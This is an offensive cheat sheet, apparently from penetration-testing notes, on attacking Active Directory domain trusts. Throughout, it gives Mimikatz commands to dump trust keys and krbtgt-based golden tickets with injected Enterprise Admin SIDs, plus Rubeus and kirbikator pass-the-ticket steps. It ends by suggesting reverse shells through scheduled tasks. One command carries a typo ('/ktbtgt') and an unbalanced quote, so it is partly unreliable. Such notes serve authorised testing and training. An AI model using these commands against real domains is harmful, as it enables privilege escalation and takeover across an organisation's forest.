TRUST BASED DOMAIN ATTACKS
USING TRUST KEY
We need Domain Admin privileges to extract trust key and perform attacks across domains with trust
To get the domain trust key using Mimikatz
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Create a Inter-Realm TGT for the target domain
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /rc4:<TRUST KEY> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"'
For specific roles the RID will change. Some important RIDs are,
Enterprise Admins - 519
Schema Admins - 518
Domain Admins - 512
Requesting a TGS from target domain using Inter-Realm TGT for Target Domain's DC
.\asktgs.exe <PATH TO TGT> CIFS/<TARGET DOMAIN>
Presenting the TGS to the service
.\kirbikator.exe lsa <TGS PATH>
Or we can use Rubeus to request and present the TGS from TGT
.\Rubeus.exe asktgs /ticket:<TRUST TGT> /service:cifs/<TARGET DOMAIN NAME> /dc:<DC OF TARGET DOMAIN> /ptt
USING KRBTGT HASH
Instead of Domain Trust Key, we are using krbtgt hash to request a TGT
Create a Inter-Realm TGT for the target domain
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /ktbtgt:<KRBTGT NTLM> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"
Executing Pass The Ticket attack with the saved TGT
Invoke-Mimikatz -Command '"kerberos::ptt <TGT PATH>"'
Try accessing WMI queries, If WMI query output displays
You can use HOST protocol also
Try spawning reverse shell via scheduled tasks
Last updated